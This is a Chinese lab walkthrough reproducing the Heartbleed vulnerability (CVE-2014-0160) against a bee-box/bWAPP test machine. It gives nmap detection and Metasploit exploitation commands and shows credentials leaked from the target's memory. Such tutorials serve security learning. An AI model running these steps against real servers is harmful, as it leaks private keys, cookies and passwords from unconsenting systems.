CVE-2014-0160漏洞復現心臟滴血

漏洞說明
Heartbleed漏洞是由於未能在memcpy()調用受害用戶輸入內容作爲長度參數之前正確進行邊界檢查。攻擊者可以追蹤OpenSSL所分配的64KB緩存、將超出必要範圍的字節信息複製到緩存當中再返回緩存內容,這樣一來受害者的內存內容就會以每次64KB的速度進行泄露。如同漏洞成因所講,可以通過該漏洞讀取每次攻擊泄露出來的信息,所以可能也可以獲取到服務器的私鑰,用戶cookie和密碼等。
漏洞影響範圍
OpenSSL1.0.1版本
漏洞復現
環境:本次環境使用 bee-box虛擬機(已集成該漏洞環境)進行測試
Ip地址:10.1.1.171
Kali IP地址:192.168.17.207

Bee-box鍵盤配置
system->preferences->keybord->layouts
點擊add,拉到最下面找到USA,
keyboard model: A4Tech KB-21
如圖所示:點Close關閉即可
在這裏插入圖片描述用火狐訪問8443端口
在這裏插入圖片描述點擊bWAPP登錄
在這裏插入圖片描述

使用nmap 的腳本進行檢測漏洞是否存在。
nmap -sV -p8443 --script ssl-heartblees.nse 10.1.1.171
-sV 版本詳細信息 -p端口 --script指定掃描腳本
在這裏插入圖片描述漏洞利用,打開kali,啓動msf,命令msfconsole
使用搜索查找heartbleed模塊命令:search heartbleed
在這裏插入圖片描述use auxiliary/scanner/ssl/openssl_heartbleed
set RHOSTS 10.1.1.171
set RPORT 8443
run
顯示存在着心臟滴血漏洞。。。。。。如圖
在這裏插入圖片描述
set verbose true
設置主要是爲了顯示整個過程以及leak
exploit
在這裏插入圖片描述

可以看到登錄的用戶名爲bee,密碼爲bug
在這裏插入圖片描述

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章